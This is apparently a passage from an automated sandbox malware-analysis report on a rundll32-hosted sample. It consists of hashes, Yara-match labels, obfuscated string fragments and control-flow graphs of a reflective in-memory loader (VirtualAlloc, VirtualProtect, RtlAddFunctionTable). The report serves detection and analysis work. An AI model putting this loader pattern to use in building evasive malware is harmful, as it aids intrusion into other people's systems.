                                                                                                                                • API ID:
                                                                                                                                • String ID: *+_$WSh$\O$#o
                                                                                                                                • API String ID: 0-1846314129
                                                                                                                                • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .B$O$M*K$\<
                                                                                                                                • API String ID: 0-3225238681
                                                                                                                                • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$$$xVO$~O
                                                                                                                                • API String ID: 0-3655128719
                                                                                                                                • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,IW$G$JMg$l
                                                                                                                                • API String ID: 0-1370644289
                                                                                                                                • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,$,$2S=$i`}G
                                                                                                                                • API String ID: 0-4285990414
                                                                                                                                • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:10.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:11
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 3264 2be35a90000 3265 2be35a90183 3264->3265 3266 2be35a9043e VirtualAlloc 3265->3266 3270 2be35a90462 3266->3270 3267 2be35a90a7b 3268 2be35a90531 GetNativeSystemInfo 3268->3267 3269 2be35a9056d VirtualAlloc 3268->3269 3274 2be35a9058b 3269->3274 3270->3267 3270->3268 3271 2be35a90a00 3271->3267 3272 2be35a90a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 2be35a909d9 VirtualProtect 3273->3274 3274->3271 3274->3273 3274->3274

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 0 2be35a90000-2be35a90460 call 2be35a90aa8 * 2 VirtualAlloc 22 2be35a9048a-2be35a90494 0->22 23 2be35a90462-2be35a90466 0->23 26 2be35a9049a-2be35a9049e 22->26 27 2be35a90a91-2be35a90aa6 22->27 24 2be35a90468-2be35a90488 23->24 24->22 24->24 26->27 28 2be35a904a4-2be35a904a8 26->28 28->27 29 2be35a904ae-2be35a904b2 28->29 29->27 30 2be35a904b8-2be35a904bf 29->30 30->27 31 2be35a904c5-2be35a904d2 30->31 31->27 32 2be35a904d8-2be35a904e1 31->32 32->27 33 2be35a904e7-2be35a904f4 32->33 33->27 34 2be35a904fa-2be35a90507 33->34 35 2be35a90509-2be35a90511 34->35 36 2be35a90531-2be35a90567 GetNativeSystemInfo 34->36 37 2be35a90513-2be35a90518 35->37 36->27 38 2be35a9056d-2be35a90589 VirtualAlloc 36->38 39 2be35a9051a-2be35a9051f 37->39 40 2be35a90521 37->40 41 2be35a9058b-2be35a9059e 38->41 42 2be35a905a0-2be35a905ac 38->42 43 2be35a90523-2be35a9052f 39->43 40->43 41->42 44 2be35a905af-2be35a905b2 42->44 43->36 43->37 46 2be35a905c1-2be35a905db 44->46 47 2be35a905b4-2be35a905bf 44->47 48 2be35a9061b-2be35a90622 46->48 49 2be35a905dd-2be35a905e2 46->49 47->44 50 2be35a90628-2be35a9062f 48->50 51 2be35a906db-2be35a906e2 48->51 52 2be35a905e4-2be35a905ea 49->52 50->51 53 2be35a90635-2be35a90642 50->53 54 2be35a906e8-2be35a906f9 51->54 55 2be35a90864-2be35a9086b 51->55 56 2be35a9060b-2be35a90619 52->56 57 2be35a905ec-2be35a90609 52->57 60 2be35a90648-2be35a9064f 53->60 61 2be35a90702-2be35a90705 54->61 58 2be35a90917-2be35a90929 55->58 59 2be35a90871-2be35a9087f 55->59 56->48 56->52 57->56 57->57 62 2be35a90a07-2be35a90a1a 58->62 63 2be35a9092f-2be35a90937 58->63 64 2be35a9090e-2be35a90911 59->64 65 2be35a90654-2be35a90658 60->65 66 2be35a90707-2be35a9070a 61->66 67 2be35a906fb-2be35a906ff 61->67 88 2be35a90a1c-2be35a90a27 62->88 89 2be35a90a40-2be35a90a4a 62->89 69 2be35a9093b-2be35a9093f 63->69 64->58 68 2be35a90884-2be35a908a9 64->68 70 2be35a906c0-2be35a906ca 65->70 71 2be35a90788-2be35a9078e 66->71 72 2be35a9070c-2be35a9071d 66->72 67->61 94 2be35a90907-2be35a9090c 68->94 95 2be35a908ab-2be35a908b1 68->95 75 2be35a909ec-2be35a909fa 69->75 76 2be35a90945-2be35a9095a 69->76 73 2be35a9065a-2be35a90669 70->73 74 2be35a906cc-2be35a906d2 70->74 78 2be35a90794-2be35a907a2 71->78 77 2be35a9071f-2be35a90720 72->77 72->78 84 2be35a9066b-2be35a90678 73->84 85 2be35a9067a-2be35a9067e 73->85 74->65 80 2be35a906d4-2be35a906d5 74->80 75->69 86 2be35a90a00-2be35a90a01 75->86 82 2be35a9097b-2be35a9097d 76->82 83 2be35a9095c-2be35a9095e 76->83 87 2be35a90722-2be35a90784 77->87 90 2be35a907a8 78->90 91 2be35a9085d-2be35a9085e 78->91 80->51 99 2be35a9097f-2be35a90981 82->99 100 2be35a909a2-2be35a909a4 82->100 96 2be35a9096e-2be35a90979 83->96 97 2be35a90960-2be35a9096c 83->97 98 2be35a906bd-2be35a906be 84->98 101 2be35a9068c-2be35a90690 85->101 102 2be35a90680-2be35a9068a 85->102 86->62 87->87 103 2be35a90786 87->103 104 2be35a90a38-2be35a90a3e 88->104 92 2be35a90a7b-2be35a90a8e 89->92 93 2be35a90a4c-2be35a90a54 89->93 105 2be35a907ae-2be35a907d4 90->105 91->55 92->27 93->92 107 2be35a90a56-2be35a90a79 RtlAddFunctionTable 93->107 94->64 116 2be35a908bb-2be35a908c8 95->116 117 2be35a908b3-2be35a908b9 95->117 108 2be35a909be-2be35a909bf 96->108 97->108 98->70 109 2be35a90989-2be35a9098b 99->109 110 2be35a90983-2be35a90987 99->110 114 2be35a909a6-2be35a909aa 100->114 115 2be35a909ac-2be35a909bb 100->115 112 2be35a90692-2be35a906a3 101->112 113 2be35a906a5-2be35a906a9 101->113 111 2be35a906b6-2be35a906ba 102->111 103->78 104->89 106 2be35a90a29-2be35a90a35 104->106 126 2be35a907d6-2be35a907d9 105->126 127 2be35a90835-2be35a90839 105->127 106->104 107->92 122 2be35a909c5-2be35a909cb 108->122 109->100 120 2be35a9098d-2be35a9098f 109->120 110->108 111->98 112->111 113->98 121 2be35a906ab-2be35a906b3 113->121 114->108 115->108 124 2be35a908ca-2be35a908d1 116->124 125 2be35a908d3-2be35a908e5 116->125 123 2be35a908ea-2be35a908fe 117->123 128 2be35a90999-2be35a909a0 120->128 129 2be35a90991-2be35a90997 120->129 121->111 130 2be35a909d9-2be35a909e9 VirtualProtect 122->130 131 2be35a909cd-2be35a909d3 122->131 123->94 142 2be35a90900-2be35a90905 123->142 124->124 124->125 125->123 133 2be35a907db-2be35a907e1 126->133 134 2be35a907e3-2be35a907f0 126->134 135 2be35a9083b 127->135 136 2be35a90844-2be35a90850 127->136 128->122 129->108 130->75 131->130 138 2be35a90812-2be35a9082c 133->138 139 2be35a907fb-2be35a9080d 134->139 140 2be35a907f2-2be35a907f9 134->140 135->136 136->105 141 2be35a90856-2be35a90857 136->141 138->127 144 2be35a9082e-2be35a90833 138->144 139->138 140->139 140->140 141->91 142->95 144->126
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240810494.000002BE35A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002BE35A90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2be35a90000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction ID: 3105cdbb31c38c2adac1c3561154c67ccaeee4d57ae7a4b1e9ff00b48bd49c7e
                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction Fuzzy Hash: 1072D330618A4CCBDB69DF18C8897F9B7E1FB98304F11466EE88AC7252DB34D542DB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                • API String ID: 0-464535774
                                                                                                                                • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                • API String ID: 0-3528011396
                                                                                                                                • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 228 180021bdf-180021bee 221->228 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 246->217 247->217
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                • API String ID: 0-3036092626
                                                                                                                                • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 261 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->261 262 18000cca0-18000cca5 256->262 284 18000cfb4-18000d00a call 1800194a4 257->284 263 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->263 264 18000c64e-18000c653 258->264 286 18000cc28-18000cc85 call 1800194a4 259->286 300 18000cedc-18000cf26 call 1800194a4 261->300 269 18000cd35-18000cdce call 18000703c call 18001c32c 262->269 270 18000ccab-18000ccb0 262->270 263->253 272 18000c9c1-18000ca52 call 18002870c call 18001c32c 264->272 273 18000c659-18000c65e 264->273 309 18000cdd3-18000ce2e call 1800194a4 269->309 279 18000ccb6-18000cd30 call 180021434 270->279 280 18000d00f-18000d014 270->280 311 18000ca57-18000caa0 call 1800194a4 272->311 282 18000c664-18000c669 273->282 283 18000c8bb-18000c963 call 180002610 call 18001c32c 273->283 279->253 280->253 288 18000d01a-18000d020 280->288 292 18000c7b2-18000c85a call 180019618 call 18001c32c 282->292 293 18000c66f-18000c674 282->293 316 18000c968-18000c9bc call 1800194a4 283->316 284->280 286->253 325 18000c85f-18000c8b6 call 1800194a4 292->325 293->280 303 18000c67a-18000c73d call 180002178 call 18001c32c 293->303 300->253 326 18000c742-18000c7ad call 1800194a4 303->326 309->253 311->253 316->253 325->253 326->253
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: +#;)$K'$sf$w\H
                                                                                                                                • API String ID: 0-1051058546
                                                                                                                                • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <4P$<8$<w.
                                                                                                                                • API String ID: 0-1030867500
                                                                                                                                • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                • API String ID: 0-2447245168
                                                                                                                                • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                • API String ID: 0-2100131636
                                                                                                                                • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                • API String ID: 0-2401169580
                                                                                                                                • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                • API String ID: 0-1318892062
                                                                                                                                • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                • API String ID: 0-3477398917
                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                Uniqueness

